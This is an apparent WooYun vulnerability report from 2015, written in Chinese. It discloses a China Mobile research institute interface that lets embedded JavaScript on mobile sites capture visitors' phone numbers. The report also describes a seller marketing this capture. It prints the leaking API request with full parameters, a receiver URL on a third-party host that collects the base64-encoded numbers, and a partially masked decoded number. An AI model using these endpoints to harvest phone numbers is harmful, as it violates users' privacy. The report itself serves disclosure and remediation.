当前位置:WooYun >> 漏洞信息

漏洞概要 关注数(24) 关注此漏洞

缺陷编号:wooyun-2015-090703

漏洞标题:中国移动某接口泄漏可导致访问网站就获取用户手机号(已经发现网站利用案例)

相关厂商:中国移动

漏洞作者: 路人甲

提交时间:2015-01-13 11:51

修复时间:2015-02-27 11:52

公开时间:2015-02-27 11:52

漏洞类型:未授权访问/权限绕过

危害等级:高

自评Rank:10

漏洞状态:已交由第三方合作机构(cncert国家互联网应急中心)处理

漏洞来源: http://www.wooyun.org,如有疑问或需要帮助请联系 [email protected]

Tags标签:

4人收藏 收藏
分享漏洞:


漏洞详情

披露状态:

2015-01-13: 细节已通知厂商并且等待厂商处理中
2015-01-16: 厂商已经确认,细节仅向厂商公开
2015-01-26: 细节向核心白帽子及相关领域专家公开
2015-02-05: 细节向普通白帽子公开
2015-02-15: 细节向实习白帽子公开
2015-02-27: 细节向公众公开

简要描述:

手机网站加载一段js代码后,即可获取到访问者的移动手机号码,获取率很高,通过分析,是移动研究院那边的泄露漏洞!

详细说明:

有商家在出售获取手机号:http://112.124.4.229:808/member/my.php?mid=21&status=4
手机网站加载一段他们提供的js代码后,即可获取到访问者的移动手机号码,获取率很高,通过分析,是移动研究院那边的泄露漏洞!
通过抓包分析可以发现:
注:抓包要用谷歌浏览器伪装成手机访问,不然抓包不到,它们屏蔽了pc!
当用户访问手机网站后,会加载一段js,js请求访问移动研究院的IP:http://218.206.176.104:8080/api/cc.jsp?cmsn=Mm1JeVFaZW9YUjZxVEhoVVc2WGZTUT09&q=http%3A%2F%2F121.40.123.23%2Frecv.php%3F_f%3D185659aff8c4e814a5d3537d9efb98bf_-_id%3Dwxkj_-_inx%3D0_-_ref%3Dhttp%25253A%25252F%25252Flocalhost.com%25252F1.php_-_query%3D%252526id%25253Dwxkj%252526c%25253D3_-corp%3D
获取到手机号之后,会把手机号通过base64加密返回给 js请求的参数q的值,如上面的:
http://121.40.123.23/recv.php?_f=185659aff8c4e814a5d3537d9efb98bf_-_id=wxkj_-_inx=0_-_ref=http%3A%2F%2Flocalhost.com%2F1.php_-_query=%26id%3Dwxkj%26c%3D3_-corp=bnVsbCxNb3ppbGxhLzUuMCAoaVBob25lOyBDUFUgaVBob25lIE9TIDdfMCBsaWtlIE1hYyBPUyBY%20OyBlbi11cykgQXBwbGVXZWJLaXQvNTM3LjUxLjEgKEtIVE1MLCBsaWtlIEdlY2tvKSBWZXJzaW9u%20LzcuMCBNb2JpbGUvMTFBNDY1IFNhZmFyaS85NTM3LjUz
参数corp 的值就是手机信息base64位加密后的,解密后可以发现内容为:
null,Mozilla/5.0 (iPhone; CPU iPhone OS 7_0 like Mac OS X; en-us) AppleWebKit/537.51.1 (KHTML, like Gecko) Version/7.0 Mobile/11A465 Safari/9537.53
如果是手机访问网站的话, null 就会是你的手机号,我电脑访问的,所以没手机号

漏洞证明:

获取手机号的接口IP:218.206.176.104:8080 是移动研究院的IP

111222.jpg


获取的效果:

666777.jpg


让某小伙伴测试 获取跳转后的url

http://121.40.123.23/recv.php?_f=185659aff8c4e814a5d3537d9efb98bf_-_id=wxkj_-_inx=0_-_ref=http%3A%2F%2Flocalhost.com%2F1.php_-_query=%26id%3Dwxkj%26c%3D3_-corp=ODYx*zYw*TE0ODA0*CxNb3ppbGxhLzUu*CAoTGludXg7IFU7IEFuZHJvaWQgNC4yLjI7IHpoLWNu%20OyBHVC1ONzEwOEQgQnVpbGQvSkRR*zkpIEFwcGxlV2ViS2l0LzUz*y4xIChLSFRNTCwgbGlrZSBH%20ZWNrbylWZXJzaW9uLzQu*CBNUVFCc*93c2VyLzUuNSBNb2JpbGUgU2F*YXJpLzUz*y4xIFYxX0FO%20RF9TUV81Lj*u*V8xOTZfWVlCX0QgUVEvNS4zLjEu*j*zNSBOZXRUeXBlLzRH


corp=后面的 url解码之后 base64解码 最后结果为

86136*******0,Mozilla/5.0 (Linux; U; Android 4.2.2; zh-cn; GT-N7108D Build/JDQ39) AppleWebKit/533.1 (KHTML, like Gecko)Version/4.0 MQQBrowser/5.5 Mobile Safari/533.1 V1_AND_SQ_5.3.1_196_YYB_D QQ/5.3.1.2335 NetType/4G


修复方案:

封掉即可!

版权声明:转载请注明来源 路人甲@乌云


漏洞回应

厂商回应:

危害等级:中

漏洞Rank:7

确认时间:2015-01-16 16:48

厂商回复:

CNVD确认并复现所述情况,已经转由CNCERT向中国移动集团公司通报,由其后续尝试协调网站管理单位处置。

最新状态:

暂无